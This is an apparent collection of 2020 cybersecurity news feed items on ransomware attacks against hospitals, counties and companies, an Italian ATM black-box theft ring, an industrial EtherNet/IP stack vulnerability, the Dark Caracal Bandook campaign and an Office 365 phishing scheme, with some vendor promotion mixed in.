Digital ID needs be ‘as easy as Uber’ says Ontario Digital Service deputy minister

Ontario is the latest province to signal its intent to allow citizens to prove their identity with the help of a digital wallet, but experts say a lot of work remains before the service can be widely used.

The post Digital ID needs be 'as easy as Uber' says Ontario Digital Service deputy minister first appeared on IT World Canada.

Quick Guide — How to Troubleshoot Active Directory Account Lockouts

Active Directory account lockouts can be hugely problematic for organizations. There have been documented instances of attackers leveraging the account lockout feature in a type of denial of service attack. By intentionally entering numerous bad passwords, attackers can theoretically lock all of the users out of their accounts. But what do you do if you are experiencing problems with account

Cyber Security Today – Executives email passwords for sale, a ransomware attack on industrial systems manufacturer and online shopping tips

Today's podcast warns that passwords of hundreds of executives is being sold to hackers, and reports on a ransomware attack on Advantech

The post Cyber Security Today - Executives email passwords for sale, a ransomware attack on industrial systems manufacturer and online shopping tips first appeared on IT World Canada.

Cyber security statistics for small organisations

No matter what size your organisation is, it will suffer a cyber attack sooner or later. There are simply too many malicious actors and too many vulnerabilities for you to identify.

Unfortunately, SMEs often fall into the trap of believing that they are too small to be on cyber criminals’ radars. Why would they even think to target you?

But criminal hackers target vulnerabilities rather than specific organisations. They look for weaknesses – whether it’s a flaw in a piece of software or an unprotected database containing sensitive information – and leverage it in whatever way they can.

That’s why small organisations need to be as concerned about cyber security as huge corporations. As we explain in our new infographic, 14 Cyber Security Statistics for SMEs, 43% of all cyber attacks occur at small organisations.

Here are some other stats from the infographic:

  • A small business is hacked every 19 seconds
  • 19% of business said the attack prevented staff from working
  • The average cost of a cyber attack increased by 61% last year, from £184,000 to £296,500
  • 70% of organisations said that remote working increases the risk of a data breach
  • Phishing attacks are the most common cause of a data breach

You can download the full infographic for free to remind you and your team of the cyber security risks that small organisations face.


See also:


The help you need with IT Governance

Most small organisations know that they should be doing more to protect themselves, but it can be difficult knowing where to begin.

That’s why, according to a Skurio report, 50% of organisations in the UK are considering outsourcing their cyber security.

This approach ensures that you get expert guidance when you need it and without the hassle of finding and appointing someone with the versatility to address whatever security issues you face.

Those considering this as a solution should take a look at our Cyber Security as a Service. With this annual subscription, you’ll receive the support you need whenever it’s necessary.

Our team will advise you on the best way to protect your organisation and guide you through essential processes such as vulnerability scans, staff training and the creation of data protection policies.

This service contains everything you need in one place, giving you the peace of mind that you’re doing everything possible to stay secure.

The post Cyber security statistics for small organisations appeared first on IT Governance UK Blog.

Company Director Disqualified After Nuisance Calls

Company Director Disqualified After Nuisance Calls

The director of a marketing company that made tens of thousands of nuisance calls has been banned from running a business for six years.

Elia Bols was director of AMS Marketing Limited, a firm founded in 2016 which was the subject of scores of complaints between October that year and October 2017.

UK regulator the Information Commissioner’s Office handed Bols a fine of £100,000 after judging that, under his direction, the firm had made over 75,000 nuisance calls. It should first have used the Telephone Preference Service (TPS) list of individuals who choose not to receive unsolicited contact, the ICO said.

AMS Marketing was wound-up in 2019, with the fine still outstanding, and Bols now lives in Australia. However, in his absence, the government has ruled that AMS Marketing broke Regulation 21 of the Privacy and Electronic Communications Regulations (PECR).

As a result, he is now disqualified from acting as director or becoming directly or indirectly involved with running or promoting a company.

“Our work with the Insolvency Service has seen the successful disqualification of 17 directors who have shut their business down to try and avoid paying a fine for illegal marketing activity,” explained Andy Curry, head of investigations at the ICO.

“Nuisance calls, emails and texts can be a huge problem and often cause people real distress. By taking unscrupulous directors out of action, we can help protect the public and their privacy.”

However, despite these successes, the ICO has been found wanting in terms of its collection of outstanding fines from such offenders.

An FOI request last month revealed that £6.6m, or over 39% of total fines, are still outstanding. Just 13% of nuisance calls fines were collected, versus 54% of data breach penalties.

University of Vermont Medical Center has yet to fully recover from October cyber attack

The University of Vermont Medical Center has yet to fully recover from a cyber attack that crippled systems at the Burlington hospital.

In October, ransomware operators hit the Wyckoff Heights Medical Center in Brooklyn and the University of Vermont Health Network. The ransomware attack took place on October 28 and disrupted services at the UVM Medical Center and affiliated facilities.

The ransomware attack has caused variable impacts at each of its affiliates.

A month later, the University of Vermont Medical Center is continuing to recover from the cyber attack that paralyzed the systems at the Burlington hospital.

The hospital announced that only on Tuesday it had restored access to its main electronic records system at the hospital

“The restoration includes inpatient and ambulatory sites at the UVM Medical Center and ambulatory clinics at Central Vermont Medical Center in Berlin, Porter Medical Center in Middlebury and Champlain Valley Physicians Hospital in Plattsburgh, New York.” reported the Associated Press.

Unfortunately, the hospital’s IT staff is still working to restore access to its and the operations could take additional time to be completed.

At the time of this writing, the hospital officials excluded that threat actors have compromised any personal information about patients.

In October, the news of the attack comes a few hours after The FBI, the DHS’s Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Health and Human Services (HHS) have issued a joint alert to warn hospitals and healthcare providers of imminent ransomware attacks from Russia.

This security advisory describes the tactics, techniques, and procedures (TTPs) associated with cyber criminals that could target organizations in the Healthcare and Public Health Sector (HPH) to infect systems with Ryuk ransomware.

At the time of the alert, the government agencies receive information about imminent attacks, threat actors are using the TrickBot botnet to deliver the infamous ransomware to the infected systems.

Pierluigi Paganini

(SecurityAffairs – hacking, Vermont Medical Center)

The post University of Vermont Medical Center has yet to fully recover from October cyber attack appeared first on Security Affairs.

Fired CISA Director Refutes Election Fraud Allegations

In 60 Minutes Interview, Christopher Krebs Says Paper Ballots Secured Election
Ex-CISA director Christopher Krebs revealed in a 60 Minutes interview exactly what made officials confident that the election results were accurate: paper ballots. Krebs didn't mention President Trump by name, but refuted claims by his administration and personal lawyer, Rudy Giuliani, that the election was corrupt.

MasterChef Producer Hit by Double Extortion Ransomware

MasterChef Producer Hit by Double Extortion Ransomware

A multibillion-dollar TV production company has become the latest big corporate name caught out by ransomware, it emerged late last week.

French multinational firm Banijay SAS owns over 120 production firms around the world, delivering TV shows ranging from MasterChef and Big Brother to Black Mirror and The Island with Bear Grylls.

In a short update last Thursday, it claimed to be managing a “cyber-incident” affecting the networks of Endemol Shine Group and Endemol Shine International, Dutch firms it acquired in a $2.2bn deal in July.

Although ransomware isn’t named in the notice, previous reports suggest the firm is being extorted.

It admitted that data may have been taken, in what would be a classic “double extortion” attack.

“The business has reason to believe certain personal data of current and ex-employees may have been compromised, as well as commercially sensitive information,” it said.

“We are continuing to take the appropriate steps and remain committed to protecting our employees, past and present, so if we do identify any cases of data being taken or misused, we will contact the affected individuals directly.”

In the meantime, the firm said it is investigating the attack with “independent specialists” and has notified the relevant authorities in the Netherlands and the UK: the two countries affected by the incident.

Banijay would do well not to engage with the extortionists. A recent Coveware report warned that “paying a threat actor not to leak stolen data provides almost no benefit to the victim.”

The vendor claimed that several ransomware groups still publicly dox companies even after payment, while others may demand a second payment to remove any data they may have stolen.

Victim organizations should in any case assume that it has been or will be either sold to other threat actors or used in a future extortion attempt, Coveware claimed.

Delaware County, Pennsylvania, opted to pay 500K ransom to DoppelPaymer gang

Delaware County, Pennsylvania opted to pay a $500,000 ransom after it was the victim of a DoppelPaymer ransomware attack last weekend.

During the last weekend Delaware County, Pennsylvania, was the victim of a DoppelPaymer ransomware attack that brought down part of its network.

According to local media, the ransomware operators have compromised systems containing sensitive information, including police reports and payroll.

“Sources told Action News, the cybercriminals gained control of the network on Saturday encrypting files, including police reports, payroll, purchasing, and other databases. Prosecution evidence, however, has not been affected.” reads the post published by Philadelphia’s 6abc’s Action News.

“Sources said the county is in the process of paying the $500,000 ransom as it’s insured for such attacks.”

The infection did not impact the Bureau of Elections and the County’s Emergency Services Department.

The incident was disclosed on Monday and now Delaware County has paid a $500,000 ransom.

“The County of Delaware recently discovered a disruption to portions of its computer network. We commenced an immediate investigation that included taking certain systems offline and working with computer forensic specialists to determine the nature and scope of the event. We are working diligently to restore the functionality of our systems,” states the incident notice published by Delaware County. “The investigation is ongoing and we are working with computer forensic specialists to understand the full nature and scope of the event and confirm accurate information before sharing the details.”

The notice also confirmed that County employees have been already notified, the FBI is also investigating the attack.

BleepingComputer was informed that the Delaware County was hit by the DoppelPaymer ransomware gang.

“BleepingComputer was also told that the ransomware gang advised Delaware County to change all of their passwords and modify their Windows domain configuration to include safeguards from the Mimikatz program.” reported BleepingComputer.

A few days ago, the Microsoft Security Response Center (MSRC) warned customers of the DoppelPaymer ransomware, the tech giant provided useful information on the threat and how it spreads.

In November, the Mexican state-owned oil company Petróleos Mexicanos (Pemex) was infected with the DoppelPaymer ransomware.

Early November, the DoppelPaymer ransomware disrupted IT operations in the territory of Nunavut (Canada), all government services requiring access to electronic data were impacted.

The TA505 cybercrime group that is known for the distribution of the Dridex Trojan and the Locky ransomware, in mid-2017 released the BitPaymer ransomware (aka FriedEx) that was used in attacks against high profile targets and organizations. The ransomware was being distributed through Remote Desktop Protocol (RDP) brute force attacks.

In July, CrowdStrike experts found a new variant of the ransomware tracked as DoppelPaymer. The discovery suggests that some members of TA505 gang left the group and forked the source code of both Dridex and BitPaymer to develop new malware. Some of the crooks behind the Dridex Trojan have split from the gang and released a forked version of the BitPaymer ransomware dubbed DoppelPaymer.

Both BitPaymer and DoppelPaymer continue to operate in parallel since then.

Other victims of the DoppelPaymer are the City of Torrance in California, the Hall County, Georgia, Newcastle University, Banijay Group SAS, Bretagne Télécom, Compal, and Visser Precision.

Pierluigi Paganini

(SecurityAffairs – hacking, DoppelPaymer)

The post Delaware County, Pennsylvania, opted to pay 500K ransom to DoppelPaymer gang appeared first on Security Affairs.

How do I select a pentesting solution for my business?

Given the number of vulnerabilities that have gone global in the past few years, enterprises can’t afford to keep relying on reactive security. Just hoping that an alert doesn’t go off isn’t a strategy. Instead, groups should embrace penetration testing. For those unfamiliar with the concept, a typical pentest project consists of a pentester putting on their “evil person” hat and attacking a target, looking to infiltrate the organization in the way that a malicious … More

The post How do I select a pentesting solution for my business? appeared first on Help Net Security.

Review: The Perfect Weapon

John Maggio, an award-winning producer, director, and writer, known for The Newspaperman: The Life and Times of Ben Bradlee (2017), Panic (2018), The Italian Americans (2015) and others, based this documentary on the homonymous best-selling book by David E. Sanger. The Perfect Weapon Released at the peak of the US 2020 election campaign and just before the election itself, the documentary examines the harsh reality of today’s conflicts between nations, relying not so much on … More

The post Review: The Perfect Weapon appeared first on Help Net Security.

Pandemic thinking: What if there were a vaccine for OT ransomware?

The year 2020 has been defined globally by the COVID-19 pandemic. One of few silver linings for this difficult set of circumstances is innovation – redesigning normal processes so that life can carry on with some degree of regularity and reliability. Pre-COVID, we all took certain risks routinely, and the consequences were minor. Now the consequences are much more serious and we respond to these risks by very carefully deciding how we expose ourselves to … More

The post Pandemic thinking: What if there were a vaccine for OT ransomware? appeared first on Help Net Security.

New wave of affordable silicon leading to greater IoT project success

With up to 75 percent of remote device management projects deemed “not successful,” in 2020, IoT deployment has been limited in realizing its full potential. Path to IoT project success However, a new wave of affordable silicon that provides a wide array of features and functionality, in conjunction with the maturation of pre-packed software, will lead to a substantial increase in IoT project success in the upcoming year, predict experts at Sequitur Labs. According to … More

The post New wave of affordable silicon leading to greater IoT project success appeared first on Help Net Security.

Hacking Christmas Gifts: Putting IoT Under the Microscope

If high-tech gadgets are on your holiday shopping list, it is worth taking a moment to think about the particular risks they may bring. Under the wrong circumstances, even an innocuous gift may introduce unexpected vulnerabilities. In this blog series, VERT will be looking at some of the Internet’s best-selling holiday gifts with an eye […]… Read More

The post Hacking Christmas Gifts: Putting IoT Under the Microscope appeared first on The State of Security.

84% of global decision makers accelerating digital transformation plans

Unit4 surveyed business and IT decision makers and users working in service industries in August and September 2020, to understand how well organizations are embracing innovation and adapting to the challenges of the pandemic. Growing people-centric innovation The study shows that 84% of global decision makers are accelerating their digital transformation plans, in response to growing demands from users, who want more flexibility to work remotely in the future. During COVID-19, global decision makers cited … More

The post 84% of global decision makers accelerating digital transformation plans appeared first on Help Net Security.

Configuración segura en la nube – Explicación de IaaS, PaaS y SaaS

Si le preguntara qué productos de seguridad tenía para administrar el riesgo dentro de su organización de TI hace 10 años, probablemente enumeraría media docena de herramientas diferentes y confianza mencionar que la mayor parte de su infraestructura estaba cubierta por un conjunto de productos clave como antivirus, DLP, firewalls, etc. Pero en un mundo […]… Read More

The post Configuración segura en la nube – Explicación de IaaS, PaaS y SaaS appeared first on The State of Security.

HD-PLC Alliance to create the IEEE P1901b standard for using HD-PLC in smart grids and factories

HD-PLC Alliance has started standardization work that will allow the use of enhanced network security functions, with the aim of using High-Definition Power Line Communication technology in the fields of smart grids and distributed power management. HD-PLC (hereinafter referred to as HD-PLC) technology has already been standardized as IEEE 1901 (Broadband over Power Line Networks for MAC and PHY) by the IEEE Standards Association. This technology is particularly attracting attention in Europe as a communication … More

The post HD-PLC Alliance to create the IEEE P1901b standard for using HD-PLC in smart grids and factories appeared first on Help Net Security.

Microsoft Azure Databricks receives FedRAMP ATO

Databricks announced that Microsoft Azure Databricks has received a Federal Risk and Authorization Management Program (FedRAMP) High Authority to Operate (ATO). This authorization validates Azure Databricks security and compliance for high-impact data analytics and AI across a wide range of public sector, industry, and enterprise use cases. FedRAMP is a standardized approach to security assessment, authorization, and continuous monitoring for cloud services as defined by the National Institute of Standards and Technology (NIST). The ATO … More

The post Microsoft Azure Databricks receives FedRAMP ATO appeared first on Help Net Security.

Crooks stole 800,000€ from ATMs in Italy with Black Box attack

A cyber criminal organization has stolen money from at least 35 Italian ATMs with a black box attack technique.

A criminal organization has stolen money from at least 35 ATMs and Post Office cash dispensers operated by Italian banks with a new black box attack technique.

The Carabinieri of Monza dismantled by the gang, the Italian law enforcement agency confirmed that the cybercrime organization stole about 800,000€ in just 7 months using #ATM Black Box attack.

The Italian Carabinieri identified 12 people, 6 have been already arrested, 3 are currently restricted in Poland, one has returned to Moldova before being stopped and 2 may no longer be on Italian territory.

According to local media, the gang had numerous logistical bases in the provinces of Milan, Monza, Bologna, Modena, Rome, Viterbo, Mantua, Vicenza and Parma.

Black box attacks are a type of jackpotting attack aimed at forcing an ATM to dispense the cash by sending a command through a “black box” device.

In this attack, a black box device, such as a mobile device or a Raspberry, is physically connected to the ATM and is used by the attackers to send commands to the machine.

The ATM black box attacks are quite popular in the cybercrime underground and several threat actors offer the hardware equipment and malware that could be used to compromise the ATMs.

Below the list of the compromised ATM:

  • UFF PP TT 12/07/2020 BELLUSCO
  • BANCA POPOLARE DI NOVARA 07/16/2020 CRODO
  • BPM 07/18/2020 WEEKLY
  • BPM 07/20/2020 MORAZZONE
  • UFF PP TT 03/08/2020 SANT’ILARIO D’ENZA
  • CASSA SAVINGS 04/08/2020 SAONARA
  • UFF PP TT 08/05/2020 CARUGATE
  • UFF PP TT 08/08/2020 PESSANO WITH BORNAGO
  • UFF PP TT 08/18/2020 SEVESO
  • UFF PP TT 08/19/2020 FAGNANO OLONA
  • BBPM 08/21/2020 COMO
  • BANCA INTESA 08/27/2020 GRONTARDO
  • BBPM 01/09/2020 BREMBATE DI ABOVE
  • UFF PP TT 01/09/2020 SIZIANO
  • UFF PP TT 02/09/2020 MELZO
  • UFF PP TT 09/04/2020 CARATE BRIANZA
  • UFF PP TT 07/09/2020 SENAGO
  • UFF PP TT 11/09/2020 BRESCIA
  • BPM 11/09/2020 PARMA
  • UFF PP TT 09/14/2020 BUSNAGO
  • BBPM 09/18/2020 ROZZANO
  • BBPM 09/18/2020 CARONNO PERTUSELLA
  • UFF PP TT 21/09/2020 GHEDI
  • BBPM 09/22/2020 CASARILE
  • BBPM 09/24/2020 MACHERIO
  • BBPM 09/30/2020 RESCALDINA
  • BBPM 09/30/2020 LIMENA
  • VOLKS 21/10/2020 VILLAVERLA
  • UNICREDIT 22/10/2020 GRISIGNANO DI ZOCCO
  • BANCO S. MARCO 10/28/2020 SPINEA
  • BANCA CAMBIANO 10/30/2020 MONTELUPO FIORENTINO
  • BBPM 11/06/2020 BIASSONO
  • BBPM 11/8/2020 Santo Srefano Ticino
  • BCC 10/11/2020 Junction of Capannelle (RM)
  • OFFICE PP. TT. 11/11/2020 Vermicino- Frascati
Black Box attack italian bank

Poorly protected ATMs are more exposed to this type of attack because crooks can easily tamper with their case in order to connect the mobile device.

In July, Diebold Nixdorf, a leading manufacturer of ATM machines, issued an alert to customers warning all banks of a new variant of ATM black box or jackpotting attacks. The alert was issued after the Agenta Bank in Belgium was forced to shut down 143 ATMs after a jackpotting attack.

All the compromised machines were Diebold Nixdorf ProCash 2050xe devices. This was the first time that Belgian authorities observe this criminal practice in the country.

According to the security alert issued by Diebold Nixdorf, and obtained by ZDNet, the new variation of black box attacks has been used in certain countries across Europe.

Pierluigi Paganini

(SecurityAffairs – hacking, black box attack)

The post Crooks stole 800,000€ from ATMs in Italy with Black Box attack appeared first on Security Affairs.

A critical flaw in industrial automation systems opens to remote hack

Experts found a critical flaw in Real-Time Automation’s (RTA) 499ES EtherNet/IP stack that could allow hacking industrial control systems.

Tracked as CVE-2020-25159, the flaw is rated 9.8 out of 10 in severity by the industry-standard Common Vulnerability Scoring System (CVSS) and impacts all versions of EtherNet/IP Adapter Source Code Stack prior to 2.28, which was released on November 21, 2012.

Security researchers from security company Claroty have discovered a critical flaw in Real-Time Automation’s (RTA) 499ES EtherNet/IP (ENIP) stack that could be exploited by a remote attacker to hack the industrial control systems.

“Claroty has privately disclosed details to Real Time Automation (RTA), informing the vendor of a critical vulnerability in its proprietary 499ES EtherNet/IP (ENIP) stack. The vulnerability could cause a denial-of-service situation, and depending on other conditions, could expose a device running older versions of the protocol to remote code execution.” reads the security advisory published by Claroty.

RTA’s ENIP stack is widely implemented in industrial automation systems.

The flaw, tracked as CVE-2020-25159, has received a CVSS score of 9.8 out of 10, it impacts all versions of EtherNet/IP Adapter Source Code Stack prior to 2.28.

Brizinov reported the stack overflow issue to the US agency CISA that published a security advisory.

“Successful exploitation of this vulnerability could cause a denial-of-service condition, and a buffer overflow may allow remote code execution,” reads the advisory published by the US cybersecurity and infrastructure agency (CISA). “The affected product is vulnerable to a stack-based buffer overflow, which may allow an attacker to send a specially crafted packet that may result in a denial-of-service condition or code execution.”

Experts used the search engines for Internet-connected devices, like Shodan.io, to search for ENIP-compatible internet-facing devices and discovered more than 8,000 systems exposed online.

Industrial Automation systems RTA-ENIP-BLOG-IMAGE-1-1024x580

Experts was that vendors may have bought vulnerable versions of this stack before the 2012 update and are still using it in their firmware.

“However, many vendors may have bought vulnerable versions of this stack prior to the 2012 update, starting in the early 2000s when it was first issued, and integrated it into their own firmware. This would leave many running in the wild still today.” continues the report.

“Claroty researchers were able to scan 290 unique ENIP-compatible devices, which identified 32 unique ENIP stacks. Eleven devices were found to be running RTA’s ENIP stack in products from six unique vendors.”

Operators have to update to current versions of the ENIP stack to address the vulnerability. CISA provided the following recommendations to minimize the risk of exploitation of this vulnerability:

  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  • Locate control system networks and remote devices behind firewalls, and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

Pierluigi Paganini

(SecurityAffairs – hacking, industrial automation systems)

The post A critical flaw in industrial automation systems opens to remote hack appeared first on Security Affairs.

Security Affairs newsletter Round 291

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box.

A cyberattack crippled the IT infrastructure of the City of Saint John
Hundreds of female sports stars and celebrities have their naked photos and videos leaked online
Romanians arrested for running underground malware services
Threat actor shared a list of 49,577 IPs vulnerable Fortinet VPNs
Computer Security and Data Privacy, the perfect alliance
FBI issued an alert on Ragnar Locker ransomware activity
Massive threat campaign strikes open-source repos, Sonatype spots new CursedGrabber malware
TikTok fixed security issues that could have led one-click account takeover
VMware discloses critical zero-day CVE-2020-4006 in Workspace One
VMware fixed SD-WAN flaws that could allow hackers to target enterprise networks
2FA bypass in cPanel potentially exposes tens of millions of websites to hack
A new Stantinko Bot masqueraded as httpd targeting Linux servers
Baidu Android apps removed from Play Store because caught collecting user details
Credential stuffing attack targeted 300K+ Spotify users
Crooks social-engineered GoDaddy staff to take over crypto-biz domains
Microsoft fixes Kerberos Authentication issues with an out-of-band Update
TrickBot operators continue to update their malware to increase resilience to takedown
Belden discloses data breach as a result of a cyber attack
Group-IB Hi-Tech Crime Trends 2020/2021 report
Operation Falcon: Group-IB helps INTERPOL identify Nigerian BEC ring members
Retail giant Home Depot agrees to a $17.5 million settlement over 2014 data breach
UK NCSCs alert urges orgs to fix MobileIron CVE-2020-15505 RCE
Watch out, WAPDropper malware could subscribe you to premium services
A zero-day in Windows 7 and Windows Server 2008 has yet to be fixed
Carding Action 2020: Group-IB supports Europol-backed operation saving €40 million
Danish news agency Ritzau hit by ransomware, but did not pay the ransom
Ransomware hits US Fertility the largest US fertility network
Sophos notifies data leak after a misconfiguration
SSH-backdoor Botnet With ‘Research Infection Technique
A week later, Manchester United has yet to recover after a cyberattack
Canon publicly confirms August ransomware attack and data breach
Details of 16 million Brazilian COVID-19 patients exposed online
Drupal emergency updates fix critical arbitrary PHP code execution
North Korean hackers allegedly behind cyberattacks on AstraZeneca
The global impact of the Fortinet 50.000 VPN leak posted online
Chip maker Advantech hit by Conti ransomware gang
Hundreds of C-level executives credentials available for $100 to $1500 per account
Office 365 phishing campaign leverages Oracle and Amazon cloud services

Pierluigi Paganini

(SecurityAffairs – hacking, newsletter)

The post Security Affairs newsletter Round 291 appeared first on Security Affairs.

Sopra Steria estimates financial Impact of ransomware attack could reach €50 Million

IT services provider Sopra Steria estimates that a recent ransomware attack will have a financial impact ranging between €40M and €50M.

At the end of October, French IT outsourcer Sopra Steria has been hit by a ransomware attack. While the company did not reveal the family of malware that infected its systems, local media speculate the involvement of the Ryuk ransomware. The European IT firm has 46,000 employees operating in 25 countries worldwide. It provides a wide range of IT services, including software development and consulting.

Now the company estimates that a recent ransomware attack will have a financial impact ranging between €40 million ($48 million) and €50 million ($60 million).

In a new statement issued by Sopra Steria, the company confirmed that it has detected an attack involving the Ryuk ransomware on 21 October.

The internal cybersecurity staff rapidly blocked the threat and the measures implemented allowed the company to contain the virus to only a limited part of the Group’s infrastructure.

“At this stage, Sopra Steria has not identified any leaked data or damage caused to its customers’ information systems.” states the company.

“The secure remediation plan launched on 26 October is nearly complete. Access has progressively been restored to workstations, R&D and production servers, and in-house tools and applications. Customer connections have also been gradually restored.”

“The remediation and differing levels of unavailability of the various systems since 21 October is expected to have a gross negative impact on the operating margin of between €40 million and €50 million. The Group’s insurance coverage for cyber risks totals €30 million.” the company added.

The IT services provider said that sales activity for the fourth quarter should not be significantly affected by this event.

Sopra Steria expects to see negative organic revenue growth of between 4.5% and 5.0% (previously ‘between -2% and -4%’) for the financial year 2020. The company also estimates an operating margin on business activity of around 6.5% (previously ‘between 6% and 7%’), and free cash flow of between €50 million and €100 million (previously ‘between €80m and €120m’).”

Pierluigi Paganini

(SecurityAffairs – hacking, Ryuk ransomware)

The post Sopra Steria estimates financial Impact of ransomware attack could reach €50 Million appeared first on Security Affairs.

Operators behind Dark Caracal are still alive and operational

The Dark Caracal APT group has carried out a series of attacks against multiple sectors using a new variant of a 13-year-old backdoor Trojan.

The Dark Caracal cyberespionage group is back, researchers from Check Point uncovered a new series of attack against multiple industries.

The Dark Caracal is an APT group associated with the Lebanese General Directorate of General, in recent attacks it employed a new version of a 13-year-old backdoor Trojan dubbed Bandook.

The Bandook was spotted last time in 2015 and 2017 campaigns, dubbed “Operation Manul” and “Dark Caracal“, respectively attributed to Kazakh and the Lebanese governments. This circumstance suggests that the implant was developed by a third-party actor and used by multiple APT groups.

“During this past year, dozens of digitally signed variants of this once commodity malware started to reappear in the threat landscape, reigniting interest in this old malware family.” reads the report published by Check Point.

“In the latest wave of attacks, we once again identified an unusually large variety of targeted sectors and locations. This further reinforces a previous hypothesis that the malware is not developed in-house and used by a single entity, but is part of an offensive infrastructure sold by a third party to governments and threat actors worldwide, to facilitate offensive cyber operations.”

During the last campaign, the hackers targeted multiple sectors including Government, financial, energy, food industry, healthcare, education, IT, and legal institutions.

The APT group targeted entities in Singapore, Cyprus, Chile, Italy, the USA, Turkey, Switzerland, Indonesia, and Germany.

The infection chain used in the attacks is constantly evolving, in the following image are reported the three main stages.

Dark Caracal malware-attack-flow

The first stage leverages a lure Microsoft Word document (e.g. “Certified documents.docx”) delivered inside a ZIP file. Upon opening the archive, malicious macros are downloaded, which subsequently proceeds to drop and execute a second-stage PowerShell script encrypted inside the original Word document.

In the last phase of the attack, the PowerShell script downloads encoded executable parts from legitimate cloud storage services like Dropbox or Bitbucket then assemble the Bandook loader, which injects the RAT into a new Internet Explorer process.

The Bandook RAT is available on the underground market since 2007, it supports common backdoor commands, including capturing screenshots and carrying out various file-related operations.

Experts noticed that the new release of Bandook is a slimmed-down version of the original variant malware and supports only 11 commands out of the 120 commands. The support for a subset of commands suggests the threat actors attempt to remain under the radar.

Experts observed several samples of the malware that were digitally signed with valid certificates issued by Certum. Check Point researchers also spotted two digitally-signed and unsigned variants which they believe are operated by a single entity.

“Some of this campaign’s characteristics and similarities to previous campaigns leads us to believe that the activity we describe in this report is indeed the continuation and evolution of the infrastructure used during the Dark Caracal operation:

  • The use of the same certificate provider (Certum) throughout the various campaigns.
  • The use of the Bandook Trojan, in what appears to be a unique evolving fork from the same source code (which is not known to be publicly available). Samples from the Dark Caracal campaign (2017) utilized around 100 commands, compared to the current 120 command version we analyzed.
  • This wave of attacks shares the same anomalous characteristics for targeted attacks –  an extreme variance in the selected targets, both in their industry and their geographic spread.” concluded the experts.

“All evidence points to our belief that the mysterious operators behind the malicious infrastructure of “Operation Manul” and “Dark Caracal” are still alive and operational, willing to assist in the offensive cyber operations to anyone who is willing to pay.”

Pierluigi Paganini

(SecurityAffairs – hacking, malware)

The post Operators behind Dark Caracal are still alive and operational appeared first on Security Affairs.

Week in review: Drupal-based sites open to attack, cPanel 2FA bypass vulnerability

Here’s an overview of some of last week’s most interesting news and articles: Challenges organizations face in combating third-party cyber risk A CyberGRX report reveals trends and challenges organizations of all sizes face in combating third-party cyber risk today. Each insight was gleaned from proprietary assessment data gathered from a sample of 4,000 third parties. cPanel 2FA bypass vulnerability can be exploited through brute force A two-factor authentication (2FA) bypass vulnerability affecting the popular cPanel … More

The post Week in review: Drupal-based sites open to attack, cPanel 2FA bypass vulnerability appeared first on Help Net Security.

Weekly Update 219: IoT Unravelled with Scott Helme

Weekly Update 219: IoT Unravelled with Scott Helme

What. A. Week. Blog post every day, massive uptick in comments, DMs, newsletter subscribers, followers and especially, blog traffic. More than 200,000 unique visitors dropped by this week, mostly to read about IoT things. This has been a fascinating experience for me and I've enjoyed sharing the journey, complete with all my mistakes 🙂 I topped the week off by spending a couple of hours talking to Scott Helme about our respective IoT experiences so that's the entirety of this week's update - Scott and I talking IoT. I hope you enjoy this temporary change in programming so here it is, the IoT unravelled livestream with Scott:

Weekly Update 219: IoT Unravelled with Scott Helme
Weekly Update 219: IoT Unravelled with Scott Helme
Weekly Update 219: IoT Unravelled with Scott Helme
Weekly Update 219: IoT Unravelled with Scott Helme

References

  1. IoT Unravelled Part 1: It's a Mess... But Then There's Home Assistant
  2. IoT Unravelled Part 2: IP Addresses, Network, Zigbee, Custom Firmware and Soldering
  3. IoT Unravelled Part 3: Security
  4. IoT Unravelled Part 4: Making it All Work for Humans
  5. IoT Unravelled Part 5: Practical Use Case Videos
  6. Sponsored by: 1Password is a secure password manager and digital wallet that keeps you safe online

Chip maker Advantech hit by Conti ransomware gang

The IIoT chip maker Advantech was hit by the Conti ransomware, the gang is now demanding over $13 million ransom from the company.

The Conti ransomware gang hit infected the systems of industrial automation and Industrial IoT (IIoT) chip maker Advantech and is demanding over $13 million ransom (roughly 750 BTC) to avoid leaking stolen files and to provide a key to restore the encrypted files.

Advantech has 8,000 employees worldwide and has reported a yearly sales revenue of over $1.7 billion in 2019.

The ransomware gang announced on November 21, 2020 the leak of stolen data if the chipmaker would not have paid the ransom within the next day.

As proof of the capability to restore the data, Conti ransomware operators are willing to decrypt two of the encrypted files.

On November 26, the ransomware operators began leaking the data stolen from Advantech, an archive of 3.03GB that accounts for 2% of the total amount of stolen data.

According to Bleeping Computer, the Conti ransomware gang also promised to remove any backdoors from the company’s network after the payment of the ransom. The operators also announced that the stolen data will be permanently removed from its servers and it will provide security tips on how to secure the network to prevent future infections.

Conti ransomware operators implement a private Ransomware-as-a-Service (RaaS), the malware appeared in the threat landscape at the end of December 2019 and was distributed through TrickBot infections.

Since August 2020, the group launched its leak site to threaten its victim to release the stolen data.

Pierluigi Paganini

(SecurityAffairs – hacking, Advantech)

The post Chip maker Advantech hit by Conti ransomware gang appeared first on Security Affairs.

Office 365 phishing campaign leverages Oracle and Amazon cloud services

Experts warn of a new sophisticated phishing scheme for stealing Office 365 credentials from small and medium-sized businesses in the U.S.

The new sophisticated phishing scheme was implemented by threat actors for stealing Office 365 credentials, it leverages both cloud services from Oracle and Amazon for their infrastructure.

The campaign has been active for more than half a year and targeted small and medium-sized businesses in the U.S. and Australia.

Threat actors used to compromise legitimate websites and used them as a proxy chain, This campaign also outstands for the abuse of legitimate services and websites for data exfiltration.

The phishing messages are fake notifications for voice messages and Zoom invitations that are created to trick victims into clicking an embedded link that finally lead the victim to the phishing page that was designed to steal login credentials.

Office 365 phishing
Source Bleeping Computer

According to cybersecurity firm Mitiga, the threat actors used compromised accounts to send out phishing messages and used Amazon Web Services (AWS) and Oracle Cloud in the redirect chain.

“Once the link was clicked, the user is redirected through several proxies, including AWS load balancers, all the way to a legitimate but compromised website” Ofir Rozmann, threat intelligence at Mitiga told Bleeping Computer.

Before the victims land the final landing page, the user is redirected through several proxies, including AWS load balancers.

Most of the fake Office 365 login pages were hosted on Oracle Cloud computing service, but experts also observed the use of Amazon Simple Storage Service (Amazon S3).

Mitiga researchers discovered more than 40 compromised websites that were employed in this Office 365 phishing campaign.

The analysis of the HTML code for the fake Office 365 pages suggests that attackers opted for a phishing-as-a-service.

